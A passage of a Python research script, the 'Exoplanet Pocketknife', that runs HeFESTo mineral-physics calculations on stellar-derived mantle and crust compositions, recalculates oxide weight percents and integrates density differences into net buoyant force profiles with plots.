os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.66".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.58".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.59".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.66".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.58".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.59".format(runname))
bsp_dir = []
morb_dir = []
os.chdir(infiledir)
for i in os.listdir(os.getcwd()):
if "BSP" in i or "bsp" in i:
print("[~] Found BSP directory: {}".format(i))
bsp_dir.append(i)
elif "MORB" in i or "morb" in i:
print("[~] Found MORB directory: {}".format(i))
morb_dir.append(i)
# else:
# print("\n[X] HeFESTo cumulative input directory not properly formatted!")
# initialization()
if len(bsp_dir) > 1 or len(morb_dir) > 1:
print("\n[X] HeFESTo cumulative input directory not properly formatted!")
time.sleep(2)
initialization()
bsp_dir = home_dir[0] + "/{}/{}".format(infiledir, bsp_dir[0])
morb_dir = home_dir[0] + "/{}/{}".format(infiledir, morb_dir[0])
print("\b[~] Initiating HeFESTo BSP calculations...")
for i in os.listdir(bsp_dir):
star_name = i[:-23]
os.chdir(home_dir[0])
if "fort.66" in os.listdir(os.getcwd()):
try:
os.remove("fort.66")
except:
pass
try:
shutil.rmtree("fort.66")
except:
pass
else:
pass
if "fort.58" in os.listdir(os.getcwd()):
try:
os.remove("fort.58")
except:
pass
try:
shutil.rmtree("fort.58")
except:
pass
else:
pass
if "fort.59" in os.listdir(os.getcwd()):
try:
os.remove("fort.59")
except:
pass
try:
shutil.rmtree("fort.59")
except:
pass
else:
pass
if "control" in os.listdir(os.getcwd()):
try:
os.remove("control")
except:
pass
try:
shutil.rmtree("control")
except:
pass
else:
pass
os.chdir(bsp_dir)
shutil.copy((bsp_dir + "/{}".format(i)), (home_dir[0] + "/{}".format("control")))
print("\n[~] Performing HeFESTo BSP calculations on: {}".format(i))
os.chdir(home_dir[0])
argz = (home_dir[0] + "/main")
p = subprocess.Popen(argz, stdin=None, stdout=None)
t = Timer(800, p.kill)
t.start()
p.communicate()
t.cancel()
if "fort.66" in os.listdir(os.getcwd()):
print("\n[~] 'fort.66' found!")
shutil.move("fort.66", (home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.66/{}".format(runname, star_name + "_fort66")))
if "fort.58" in os.listdir(os.getcwd()):
print("\n[~] 'fort.58' found!")
shutil.move("fort.58", (home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.58/{}".format(runname, star_name + "_fort58")))
if "fort.59" in os.listdir(os.getcwd()):
print("\n[~] 'fort.59' found!")
shutil.move("fort.59", (home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.59/{}".format(runname, star_name + "_fort59")))
if "control" in os.listdir(os.getcwd()):
os.remove("control")
time.sleep(2)
print("\b[~] Initiating HeFESTo crust calculations...")
for i in os.listdir(morb_dir):
star_name = i[:-24]
os.chdir(home_dir[0])
if "fort.66" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/fort.66")
if "fort.58" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/fort.58")
if "fort.59" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/fort.59")
if "control" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/control")
os.chdir(morb_dir)
shutil.copy((morb_dir + "/{}".format(i)), (home_dir[0] + "/{}".format("control")))
print("\n[~] Performing HeFESTo crust calculations on: {}".format(i))
os.chdir(home_dir[0])
argz = (home_dir[0] + "/main")
p = subprocess.Popen(argz, stdin=None, stdout=None)
t = Timer(800, p.kill)
t.start()
p.communicate()
t.cancel()
try:
if "fort.66" in os.listdir(home_dir[0]):
print("\n[~] 'fort.66; found!")
shutil.move(home_dir[0] + "/fort.66", (home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.66/{}".format(runname, star_name + "_fort66")))
if "fort.58" in os.listdir(home_dir[0]):
print("\n[~] 'fort.58' found!")
shutil.move(home_dir[0] + "/fort.58", (home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.58/{}".format(runname, star_name + "_fort58")))
if "fort.59" in os.listdir(home_dir[0]):
print("\n[~] 'fort.59 found!")
shutil.move(home_dir[0] + "/fort.59", (home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.59/{}".format(runname, star_name + "_fort59")))
if "control" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/control")
except:
pass
os.chdir(home_dir[0])
if "fort.66" in os.listdir(os.getcwd()):
os.remove("fort.66")
if "fort.58" in os.listdir(os.getcwd()):
os.remove("fort.58")
if "fort.66" in os.listdir(os.getcwd()):
os.remove("fort.69")
if "control" in os.listdir(os.getcwd()):
os.remove("control")
if os.path.exists("{}_HeFESTo_Output_Files".format(runname)):
shutil.rmtree("{}_HeFESTo_Output_Files".format(runname))
os.mkdir("{}_HeFESTo_Output_Files".format(runname))
shutil.move(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname), home_dir[0] + "/{}_HeFESTo_Output_Files".format(runname))
shutil.move(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname), home_dir[0] + "/{}_HeFESTo_Output_Files".format(runname))
print("\n[~] HeFESTo Output Files available at '{}'".format(home_dir[0] + "/{}_HeFESTo_Output_Files".format(runname)))
print("\n[~] Finished with HeFESTo calculations!")
# bsp_infile_init = (home_dir[0] + "/{}".format(hefesto_input_bsp))
# bsp_infile_to = (home_dir[0] + "/HeFESTo_BSP_Input_Files/{}".format(hefesto_input_bsp))
# morb_infile_init = (home_dir[0] + "/{}".format(hefesto_input_morb))
# morb_infile_to = (home_dir[0] + "/HeFESTo_MORB_Input_Files/{}".format(hefesto_input_morb))
# shutil.copy(bsp_infile_init, bsp_infile_to)
# shutil.copy(morb_infile_init, morb_infile_to)
# os.chdir(bsp_dir)
# with open(hefesto_input_bsp, 'r') as infile:
# reader = csv.reader(infile, delimiter=",")
# for row in reader:
# list_formatted = []
# for z in row:
# list_formatted.append(z)
# title = list_formatted[0].strip()
# output_file = open("{}_HeFESTo_BSP_nput.txt".format(title), 'a')
# for z in list_formatted[1:]:
# output_file.write("{}\n".format(z))
# output_file.close()
#
# os.chdir(home_dir[0] + "/HeFESTo_MORB_Input_Files")
# with open(hefesto_input_morb, 'r') as infile:
# reader = csv.reader(infile, delimiter=",")
# for row in reader:
# list_formatted = []
# for z in row:
# list_formatted.append(z)
# title = list_formatted[0].strip()
# output_file = open("{}_HeFESTo_MORB_Input.txt".format(title), 'a')
# for z in list_formatted[1:]:
# output_file.write("{}\n".format(z))
# output_file.close()
# print("[~] HeFESTo files written!\n"
# "Please see {} for your files!\n".format(os.getcwd()))
# except:
# pass
# os.chdir(home_dir[0] + "/HeFESTo_BSP_Input_Files")
# print("[~] Launching HeFESTo simulations...")
# # curr_planet = ""
# # for i in os.listdir(os.getcwd()):
# # curr_planet.update(i)
# # print("[~] Currently simulating BSP for: {}".format(curr_planet.get()))
#
#
#
# else:
# try:
# if os.path.exists(home_dir[0] + "/HeFESTo_Inputs"):
# shutil.rmtree(home_dir[0] + "/HeFESTo_Inputs")
# else:
# pass
# os.mkdir(home_dir[0] + "/HeFESTo_Inputs")
# os.chdir(home_dir[0])
# print("\nPlease enter the name of your HeFESTo input .csv sheet:")
# hefesto_input = input(">>> ")
# if hefesto_input in os.listdir(os.getcwd()):
# print("[~] {} has been found in the working directory!".format(hefesto_input))
# else:
# print("[X] {} has NOT been found in the working directory!".format(hefesto_input))
# time.sleep(4)
# initialization()
#
# infile_init = (home_dir[0] + "/{}".format(hefesto_input))
# infile_to = (home_dir[0] + "/HeFESTo_Inputs/{}".format(hefesto_input))
# shutil.copy(infile_init, infile_to)
#
# os.chdir(home_dir[0] + "/HeFESTo_Inputs")
# with open(hefesto_input, 'r') as infile:
# reader = csv.reader(infile, delimiter=",")
# for row in reader:
# list_formatted = []
# for z in row:
# list_formatted.append(z)
# title = list_formatted[0].strip()
# output_file = open("{}_HeFESTo_Input.txt".format(title), 'a')
# for z in list_formatted[1:]:
# output_file.write("{}\n".format(z))
# # if z.isalpha() == True:
# # output_file.write("{}\n".format(z))
# # else:
# # output_file.write("{}\n".format(z))
# output_file.close()
# print("[~] HeFESTo files written!\n"
# "Please see {} for your files!\n".format(os.getcwd()))
# except:
# pass
def scrapemorb(infiledirectory, infilename):
if "{}_MORB_Consolidated_Chem_File".format(infilename) in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}_MORB_Consolidated_Chem_File".format(infilename))
else:
pass
morb_outfile = open((home_dir[0] + "/{}_MORB_Consolidated_Chem_File".format(infilename)), 'a') # need a header
morb_outfile_header = "Star Name,Pressure,Temperature,mass,SiO2,TiO2,Al2O3,Fe2O3,Cr2O3,FeO,MgO,CaO,Na2O\n"
morb_outfile.write(morb_outfile_header)
for i in os.listdir(infiledirectory):
try:
print("\n[~] Scraping MORB output file: {}".format(i))
os.chdir(infiledirectory)
with open(i, 'r') as infile:
star_name = []
data = []
reader = csv.reader(infile, delimiter=',')
reader2 = list(reader)
star_name.append(reader2[0][1])
                # only scrape runs whose output table has a reasonable number of rows
                # (the 100-row threshold is an assumption)
                if len(reader2) >= 100:
for num, line in enumerate(reader2, 1):
if "Liquid" in line:
skip_row2 = num + 1
liquid_comp = reader2[skip_row2]
for item in liquid_comp:
data.append(item)
else:
pass
data_formatted = ",".join(str(z) for z in data)
os.chdir(home_dir[0])
morb_outfile.write("{},{}\n".format(star_name[0], data_formatted))
else:
os.chdir(home_dir[0])
morb_outfile.write("{},ERROR!\n".format(star_name[0]))
except:
pass
morb_outfile.close()
os.chdir(home_dir[0])
consol_file = (home_dir[0] + "/{}_MORB_Consolidated_Chem_File".format(infilename))
morbrecalc(infiledirectory=infiledirectory, infilename=infilename, bulkfilename=consol_file)
def morbrecalc(infiledirectory, infilename, bulkfilename):
os.chdir(home_dir[0])
if "{}_MORB_Recalc_Bulkfile.csv".format(infilename) in os.listdir(os.getcwd()):
os.remove("{}_MORB_Recalc_Bulkfile.csv".format(infilename))
else:
pass
if "morb_debug.csv" in os.listdir(os.getcwd()):
os.remove("morb_debug.csv")
morb_debug = open("morb_debug.csv", 'a')
morb_recalc_outfile = open("{}_MORB_Recalc_Bulkfile.csv".format(infilename), 'a')
morb_recalc_outfile_header = "Star,Pressure,Temperature,Mass,SiO2,TiO2,Al2O3,Cr2O3,FeO,MgO,CaO,Na2O,SUM\n"
morb_recalc_outfile.write(morb_recalc_outfile_header)
df_morb_chem = pd.read_csv(bulkfilename)
for row in df_morb_chem.index:
try:
star_name = df_morb_chem["Star Name"][row]
pressure = float(df_morb_chem["Pressure"][row])
temperature = float(df_morb_chem["Temperature"][row])
mass = float(df_morb_chem["mass"][row])
sio2_in = float(df_morb_chem["SiO2"][row])
tio2_in = float(df_morb_chem["TiO2"][row])
al2o3_in = float(df_morb_chem["Al2O3"][row])
fe2o3_in = float(df_morb_chem["Fe2O3"][row])
cr2o3_in = float(df_morb_chem["Cr2O3"][row])
feo_in = float(df_morb_chem["FeO"][row])
mgo_in = float(df_morb_chem["MgO"][row])
cao_in = float(df_morb_chem["CaO"][row])
na2o_in = float(df_morb_chem["Na2O"][row])
chem_in_sum = (sio2_in + tio2_in + al2o3_in + fe2o3_in + cr2o3_in + feo_in + mgo_in + cao_in + na2o_in)
            md1_header = "1,sio2,tio2,al2o3,fe2o3,cr2o3,feo,mgo,cao,na2o"
md1 = ",{},{},{},{},{},{},{},{},{}".format(sio2_in, tio2_in, al2o3_in, fe2o3_in,
cr2o3_in, feo_in, mgo_in, cao_in, na2o_in)
morb_debug.write("{}\n{}\n".format(md1_header, md1))
wt_sio2_in = (sio2_in/100.0) * mass
wt_tio2_in = (tio2_in / 100.0) * mass
wt_al2o3_in = (al2o3_in / 100.0) * mass
wt_fe2o3_in = (fe2o3_in / 100.0) * mass
wt_cr2o3_in = (cr2o3_in / 100.0) * mass
wt_feo_in = (feo_in / 100.0) * mass
wt_mgo_in = (mgo_in / 100.0) * mass
wt_cao_in = (cao_in / 100.0) * mass
wt_na2o_in = (na2o_in / 100.0) * mass
sum_wt_in = (wt_sio2_in + wt_tio2_in + wt_al2o3_in + wt_fe2o3_in + wt_cr2o3_in + wt_feo_in +
wt_mgo_in + wt_cao_in + wt_na2o_in)
md2_header = "2,sio2,tio2,al2o3,fe2o3,cr2o3,feo,mgo,cao,na2o"
md2 = ",{},{},{},{},{},{},{},{},{}".format(wt_sio2_in, wt_tio2_in, wt_al2o3_in, wt_fe2o3_in,
wt_cr2o3_in, wt_feo_in, wt_mgo_in, wt_cao_in, wt_na2o_in)
morb_debug.write("{}\n{}\n".format(md2_header, md2))
sio2_moles = wt_sio2_in / sio2_molwt
tio2_moles = wt_tio2_in / tio2_molwt
al2o3_moles = wt_al2o3_in / al2o3_molwt
fe2o3_moles = wt_fe2o3_in / fe2o3_molwt
cr2o3_moles = wt_cr2o3_in / cr2o3_molwt
feo_moles = wt_feo_in / feo_molwt
mgo_moles = wt_mgo_in / mgo_molwt
cao_moles = wt_cao_in / cao_molwt
na2o_moles = wt_na2o_in / na2o_molwt
sum_oxide_moles = (sio2_moles + tio2_moles + al2o3_moles + fe2o3_moles + cr2o3_moles + feo_moles +
mgo_moles + cao_moles + na2o_moles)
            md3_header = "3,sio2,tio2,al2o3,fe2o3,cr2o3,feo,mgo,cao,na2o"
md3 = ",{},{},{},{},{},{},{},{},{}".format(sio2_moles, tio2_moles, al2o3_moles, fe2o3_moles,
cr2o3_moles, feo_moles, mgo_moles, cao_moles, na2o_moles)
morb_debug.write("{}\n{}\n".format(md3_header, md3))
si_cations = sio2_moles * num_sio2_cations
ti_cations = tio2_moles * num_tio2_cations
al_cations = al2o3_moles * num_al2o3_cations
fe_fe2o3_cations = fe2o3_moles * num_fe2o3_cations
cr_cations = cr2o3_moles * num_cr2o3_cations
fe_feo_cations = feo_moles * num_feo_cations
mg_cations = mgo_moles * num_mgo_cations
ca_cations = cao_moles * num_cao_cations
na_cations = na2o_moles * num_na2o_cations
sum_cations = (si_cations + ti_cations + al_cations + fe_fe2o3_cations + cr_cations + fe_feo_cations + mg_cations +
ca_cations + na_cations)
md4_header = "4,si,ti,al,fe,cr,fe,mg,ca,na,sum"
md4 = ",{},{},{},{},{},{},{},{},{},{}".format(si_cations, ti_cations, al_cations, fe_fe2o3_cations, cr_cations,
                                                          fe_feo_cations, mg_cations, ca_cations, na_cations, sum_cations)
morb_debug.write("{}\n{}\n".format(md4_header, md4))
# fe2o3 --> feo recalc
total_mol_fe = (fe_feo_cations + fe_fe2o3_cations)
total_wt_fe = total_mol_fe * fe_atwt
total_wt_feo = total_mol_fe * feo_molwt
md5_header = "5,total_mol_fe,total_wt_fe,total_wt_feo"
md5 = ",{},{},{}".format(total_mol_fe, total_wt_fe, total_wt_feo)
morb_debug.write("{}\n{}\n".format(md5_header, md5))
# unnormalized wt%
unnorm_sum = (wt_sio2_in + wt_tio2_in + wt_al2o3_in + total_wt_feo +
wt_cr2o3_in + wt_mgo_in + wt_cao_in + wt_na2o_in)
# normalized oxide wt% w/o mgo fix
norm_wt_sio2 = wt_sio2_in / unnorm_sum
norm_wt_tio2 = wt_tio2_in / unnorm_sum
norm_wt_al2o3 = wt_al2o3_in / unnorm_sum
norm_wt_feo = total_wt_feo / unnorm_sum
norm_wt_cr2o3 = wt_cr2o3_in / unnorm_sum
norm_wt_mgo = wt_mgo_in / unnorm_sum
norm_wt_cao = wt_cao_in / unnorm_sum
norm_wt_na2o = wt_na2o_in / unnorm_sum
norm_sum_nomgofix = (norm_wt_sio2 + norm_wt_tio2 + norm_wt_al2o3 + norm_wt_feo + norm_wt_cr2o3 + norm_wt_mgo +
norm_wt_cao + norm_wt_na2o)
md6_header = "6,sio2,tio2,al2o3,feo,cr2o3,mgo,cao,na2o,sum"
md6 = ",{},{},{},{},{},{},{},{},{}".format(norm_wt_sio2, norm_wt_tio2, norm_wt_al2o3,
norm_wt_feo, norm_wt_cr2o3, norm_wt_mgo, norm_wt_cao, norm_wt_na2o, norm_sum_nomgofix)
morb_debug.write("{}\n{}\n".format(md6_header, md6))
# mgo fix
norm_wt_mgo_fix = norm_wt_mgo * mgo_fix
norm_sum_mgofix = (norm_wt_sio2 + norm_wt_tio2 + norm_wt_al2o3 + norm_wt_feo + norm_wt_cr2o3 + norm_wt_mgo_fix +
norm_wt_cao + norm_wt_na2o)
md7_header = "7,mgo_fix,norm_wt_mgo_fx,norm_sum_mgofix"
md7 = ",{},{},{}".format(mgo_fix, norm_wt_mgo_fix, norm_sum_mgofix)
morb_debug.write("{}\n{}\n".format(md7_header, md7))
            # normalized oxide wt% abundances --- what we want!
sio2_wtpct = (norm_wt_sio2 / norm_sum_mgofix) * 100
tio2_wtpct = (norm_wt_tio2 / norm_sum_mgofix) * 100
al2o3_wtpct = (norm_wt_al2o3 / norm_sum_mgofix) * 100
feo_wtpct = (norm_wt_feo / norm_sum_mgofix) * 100
cr2o3_wtpct = (norm_wt_cr2o3 / norm_sum_mgofix) * 100
mgo_wtpct = (norm_wt_mgo_fix / norm_sum_mgofix) * 100
cao_wtpct = (norm_wt_cao / norm_sum_mgofix) * 100
na2o_wtpct = (norm_wt_na2o / norm_sum_mgofix) * 100
sum_wtpct = (sio2_wtpct + tio2_wtpct + al2o3_wtpct + feo_wtpct + cr2o3_wtpct + mgo_wtpct + cao_wtpct + na2o_wtpct)
md8_header = "8,sio2,tio2,al2o3,feo,cr2o3,mgo,cao,na2o,sum"
md8 = ",{},{},{},{},{},{},{},{},{}".format(sio2_wtpct, tio2_wtpct, al2o3_wtpct, feo_wtpct,
cr2o3_wtpct, mgo_wtpct, cao_wtpct, na2o_wtpct, sum_wtpct)
morb_debug.write("{}\n{}\n".format(md8_header, md8))
chem_to_outfile = "{},{},{},{},{},{},{},{},{},{},{},{},{}\n".format(star_name, pressure, temperature, mass, sio2_wtpct,
tio2_wtpct, al2o3_wtpct, cr2o3_wtpct, feo_wtpct, mgo_wtpct, cao_wtpct, na2o_wtpct, sum_wtpct)
morb_recalc_outfile.write(chem_to_outfile)
except:
pass
morb_debug.close()
morb_recalc_outfile.close()
hefestofilewriter_morb(bulkfile="{}_MORB_Recalc_Bulkfile.csv".format(infilename), infilename=infilename)
def integrationloop2(hefestodir, runname):
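    # For each star, pair the BSP and MORB HeFESTo density profiles (fort.58 output),
    # integrate the density difference between the two profiles over depth, and write
    # the net buoyant force (and its running profile with depth) to a consolidated CSV.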
# standard_depths = []
#
# model_sun_bsp_rho = [3.1399, 3.16644, 3.21129, 3.21993, 3.22843, 3.23679, 3.24503, 3.25316, 3.26117, 3.26909, 3.28169, 3.29415,
# 3.30499, 3.31476, 3.3238, 3.33232, 3.34046, 3.34832, 3.35595, 3.3634, 3.3707, 3.37788, 3.38495, 3.39193,
# 3.39884, 3.40567, 3.41244, 3.41916, 3.42582, 3.43244, 3.43902, 3.44557, 3.45208, 3.45857, 3.46504, 3.47149,
# 3.47794, 3.48438, 3.49083, 3.4973, 3.50379, 3.51032, 3.51783, 3.52856, 3.5352, 3.54193, 3.54876, 3.55574,
# 3.56291, 3.57035, 3.57813, 3.58638, 3.59525, 3.60495, 3.61577, 3.69282, 3.7338, 3.74885, 3.75742, 3.76575,
# 3.77393, 3.78203, 3.79015, 3.79837, 3.80676, 3.81424, 3.81873, 3.82321, 3.82768, 3.83213, 3.83656, 3.84098,
# 3.84538, 3.84977, 3.85831, 3.87594, 3.89625, 3.90832, 3.91254, 3.91675, 3.92094]
#
# model_sun_crust_rho = [2.89708, 2.92792, 2.94455, 3.04297, 3.17487, 3.19574, 3.25329, 3.36196, 3.37489,
# 3.38665, 3.39781, 3.40855, 3.43322, 3.4435, 3.45364, 3.46287, 3.47109, 3.47896, 3.4865,
# 3.49376, 3.50079, 3.50761, 3.51426, 3.52077, 3.52715, 3.53344, 3.53963, 3.54574, 3.55179,
# 3.55777, 3.56371, 3.5696, 3.57545, 3.58126, 3.58704, 3.59279, 3.66547, 3.67112, 3.67676,
# 3.68238, 3.68799, 3.69359, 3.69919, 3.70479, 3.71039, 3.71601, 3.72163, 3.72728, 3.73294,
# 3.73864, 3.74438, 3.75015, 3.75598, 3.76188, 3.76784, 3.77389, 3.78003, 3.78629, 3.79267,
# 3.79921, 3.80591, 3.8128, 3.81991, 3.82728, 3.83492, 3.84288, 3.85119, 3.85991, 3.86906,
# 3.8787, 3.88887, 3.89961, 3.91094, 3.9229, 3.9355, 3.94971, 3.97115, 3.99127, 4.01053,
# 4.02931, 4.04793]
#
# model_sun_delta_rho = [a - b for a, b in zip(model_sun_crust_rho, model_sun_bsp_rho)]
#
# lit_sun_bsp_rho = []
#
# lit_sun_crust_rho = [2.96748, 2.98934, 3.02871, 3.12504, 3.2649, 3.32414, 3.40401, 3.41811, 3.43281, 3.44608,
# 3.45855, 3.47031, 3.5037, 3.51281, 3.52141, 3.52955, 3.5373, 3.54472, 3.55187, 3.55881, 3.56557,
# 3.57218, 3.57866, 3.58505, 3.59134, 3.59757, 3.60373, 3.60984, 3.6159, 3.62192, 3.62791,
# 3.63387, 3.6398, 3.64571, 3.6516, 3.65749, 3.75811, 3.7639, 3.7697, 3.77549, 3.7813, 3.78712,
# 3.79296, 3.79882, 3.80472, 3.81065, 3.81662, 3.82265, 3.82874, 3.8349, 3.84114, 3.84747, 3.85391,
# 3.86047, 3.86718, 3.87404, 3.88108, 3.88832, 3.89579, 3.90353, 3.91157, 3.91994, 3.92868, 3.93784,
# 3.94746, 3.95758, 3.96823, 3.97945, 3.99123, 4.00355, 4.01639, 4.02969, 4.04339, 4.05801,
# 4.07212, 4.08535, 4.09777, 4.10947, 4.1205, 4.13093, 4.14081]
print("\n")
hefesto_dir = home_dir[0] + "/" + hefestodir
output_folder = home_dir[0] + "/{}_Buoyancy_Outputs".format(runname)
if os.path.exists(output_folder):
shutil.rmtree(output_folder)
else:
pass
os.mkdir(output_folder)
bsp_and_morb_dir = [] # BSP dir at index 0, MORB dir at index 1
for i in os.listdir(hefesto_dir):
if "BSP" in str(i):
bsp_and_morb_dir.append(str(hefesto_dir + "/" + i + "/fort.58"))
elif "MORB" in str(i):
bsp_and_morb_dir.append(str(hefesto_dir + "/" + i + "/fort.58"))
if len(bsp_and_morb_dir) != 2:
print("\n[X] The directory '{}' is not formatted properly!".format(hefesto_dir))
time.sleep(2)
initialization()
else:
print("\n[~] Found BSP HeFESTo File directory: '{}'!".format(bsp_and_morb_dir[0]))
print("[~] Found MORB HeFESTo File directory: '{}'!".format(bsp_and_morb_dir[1]))
if "{}_Integrated_Values.csv".format(runname) in os.listdir(home_dir[0]):
os.remove("{}_Integrated_Values.csv".format(runname))
integrated_output_file = open("{}_Integrated_Values.csv".format(runname), 'a')
integrated_output_file.write("Star,Net Buoyant Force,{}".format(",".join(str(i) for i in depth_trans_zone)))
print("\n[~] Initiating HeFESTo output file parsing...")
# planet_grav = (6.674*10**-11) * (planet_mass / planet_radius**2)
for i in os.listdir(bsp_and_morb_dir[0]):
star_name = i.replace("fort.58.control.", "").replace("_fort.58", "").replace("_bsp.txt_bsp", "").replace("fort.58_", "").replace("_fort58", "")
try:
for z in os.listdir(bsp_and_morb_dir[1]):
starname_morb = z.replace("fort.58.control.", "").replace("fort.58_", "").replace("_morb.txt_morb", "").replace("_fort.58", "").replace("_fort58", "")
                    if star_name == starname_morb:
print("\n\n[~] Matched BSP and MORB files for star: {}".format(star_name))
os.chdir(bsp_and_morb_dir[0])
with open(i, 'r') as bsp_infile:
os.chdir(bsp_and_morb_dir[1])
with open(z, 'r') as morb_infile:
bsp_readfile = pd.read_fwf(bsp_infile, colspecs='infer')
morb_readfile = pd.read_fwf(morb_infile, colspecs='infer')
bsp_df = bsp_readfile.iloc[:, [1, 3]]
morb_df = morb_readfile.iloc[:, [1, 3]]
depths = []
bsp_rho = []
morb_rho = []
morb_minus_bsp_rho = []
integrated_values = []
for y in bsp_df['depth']:
depths.append(float(y))
for y in bsp_df['rho']:
bsp_rho.append(float(y))
for y in morb_df['rho']:
morb_rho.append(float(y))
bsp_infile.close()
morb_infile.close()
cur_index = 0
for q in morb_rho:
corresponding_bsp = bsp_rho[cur_index]
morb_minus_bsp_rho.append(corresponding_bsp - q)
# morb_minus_bsp_rho.append(q - corresponding_bsp)
cur_index += 1
# print("\nDEPTHS")
# print(depths)
# print("\nBSPRHO")
# print(bsp_rho)
# print("\nMORBRHO")
# print(morb_rho)
# print("\nDELTARHO")
# print(morb_minus_bsp_rho)
for t in range(len(morb_minus_bsp_rho) - 1):
x = depths[:(t + 2)]
y = morb_minus_bsp_rho[:(t + 2)]
# integrated_values.append(inte.simps(y, x))
integrated_values.append((inte.simps(y, x) * 1000 * 1000 * plate_thickness * gravity)) # Multiply by 1000 to account for g/cm^3 -> kg/m^3, and by 1000 again for depth km -> m.
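                        # Net buoyant force per unit length of slab:
                        #   F ~ plate_thickness * g * integral(delta_rho dz),
                        # with delta_rho in g/cm^3 (x1000 -> kg/m^3) and depth in km (x1000 -> m);
                        # plate_thickness is assumed to be in metres, giving the N/m plotted later.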
# print("\nINTEVALS")
# print(integrated_values)
print("[~] Calculated a net buoyancy force of {} for star {}!".format(integrated_values[-1], star_name))
os.chdir(home_dir[0])
integrated_vals_formatted = ",".join(str(i) for i in integrated_values)
integrated_output_file.write("\n{},{},{}".format(star_name, str(integrated_values[-1]), integrated_vals_formatted))
except:
integrated_output_file.write("\n{},{}".format(star_name, "FAILURE"))
print("[X] Failed to calculate a net buoyancy force for star {}!".format(star_name))
integrated_output_file.close()
print("\n[~] Net buoyant force output file '{}' available in '{}'!".format("{}_Integrated_Values.csv".format(runname), home_dir[0]))
def visualize_outputs(integrated_output_file, runname):
os.chdir(home_dir[0])
print("\n[~] Preparing to plot integrated buoyancy force results...")
if os.path.exists("{}_Buoyancy_Force_Graphs".format(runname)):
shutil.rmtree("{}_Buoyancy_Force_Graphs".format(runname))
os.mkdir("{}_Buoyancy_Force_Graphs".format(runname))
loop_num = 1
integrated_output_file_df = pd.read_csv(integrated_output_file)
for row in integrated_output_file_df.index:
try:
integrated_buoyant_vals = []
star_name = integrated_output_file_df['Star'][row]
print("\n[~] Plotting integrated buoyancy force results for star: {}".format(star_name))
if "{}.png".format(star_name) in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}_Buoyancy_Force_Graphs/{}.png".format(runname, star_name))
buoyant_force = integrated_output_file_df['Net Buoyant Force'][row]
with open(integrated_output_file, 'r') as inte_output:
reader = csv.reader(inte_output)
for i, row in enumerate(reader):
if i == loop_num:
for z in row[2:]:
integrated_buoyant_vals.append(float(z))
loop_num += 1
inte_output.close()
plt.plot(depth_trans_zone[1:], integrated_buoyant_vals)
plt.title("{} Net Buoyant Forces".format(star_name))
plt.xlabel("Depth (km)")
plt.ylabel("Buoyant Force (N/m)")
plt.xlim(0, 574)
plt.grid()
plt.savefig("{}.png".format(star_name), format='png')
plt.close()
fdir = home_dir[0] + "/{}.png".format(star_name)
tdir = home_dir[0] + "/{}_Buoyancy_Force_Graphs/{}.png".format(runname, star_name)
shutil.move(fdir, tdir)
print("[~] Buoyant force plot for star {} available in directory '{}'!".format(star_name, tdir))
except:
print("[X] Failed to build a plot for star {}!".format(star_name))
print("\n[~] Thank you for using the Exoplanet Pocketknife!\n[~] Returning to main menu...")
time.sleep(2)
initialization()
def decideplot():
print("\n[~] Would you like to graph the integrated buoyancy force results?\nPlease enter 'y' or 'n' for 'yes' or 'no', respectively")
plot_input = raw_input(">>> ")
if plot_input == 'y':
visualize_outputs(integrated_output_file="{}_Integrated_Values.csv".format(runname), runname=runname)
elif plot_input == 'n':
print("\n[~] Thank you for using the Exoplanet Pocketknife!\nReturning to the main menu...")
time.sleep(2)
initialization()
else:
print("\n[X] Oops! That's not a valid command!")
time.sleep(2)
decideplot()
decideplot()
def initialization():
home_dir.append(os.getcwd())
# integrationloop2()
createbspenvfile()
createmorbenvfile()
print("\n_______________________________________________\n\n\n\n\n\n\n\n\n\n")
print("\n\n\nThe Exoplanet Pocketknife\nScott D. Hull, The Ohio State University 2015-2017\n")
print("This software is meant to work in conjunction with the methods described in 'The Prevalence of"
" Exoplanetary Plate Tectonics' (Unterborn et. al 2017).\nPlease refer to the article and "
"the documentation for more information.\n"
"\n*Any use of this software or the methods described in Unterborn et al. 2017 requires proper"
" citation.*\n\n")
# if "Star2Oxide_Output.csv" in os.listdir(os.getcwd()):
# os.remove("Star2Oxide_Output.csv")
# else:
# pass
# outputfile = open("Star2Oxide_Output.csv", 'a')
# time.sleep(1)
print("Enter:\n"
"'1' to raw_input [X/H] stellar abundances\n"
"'2' to raw_input stellar mole abundances\n"
"'3' to launch HeFESTo calculations\n"
"'4' to perform buoyancy force calculations & visualize\n"
"'o' for more options\n"
"'e' to exit the Exoplanet Pocketknife\n")
option1 = str(raw_input(">>> "))
if option1 == '1':
if "run_alphamelts.command" in os.listdir(os.getcwd()):
print("\nPlease enter your .csv formatted raw_input file with [X/H] stellar abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
logep(infile, infile_type='BSP', consol_file=False, init_path=(os.getcwd()), library=True)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] 'run_alphamelts.command' is not in the working directory!")
time.sleep(2)
initialization()
elif option1 == '2':
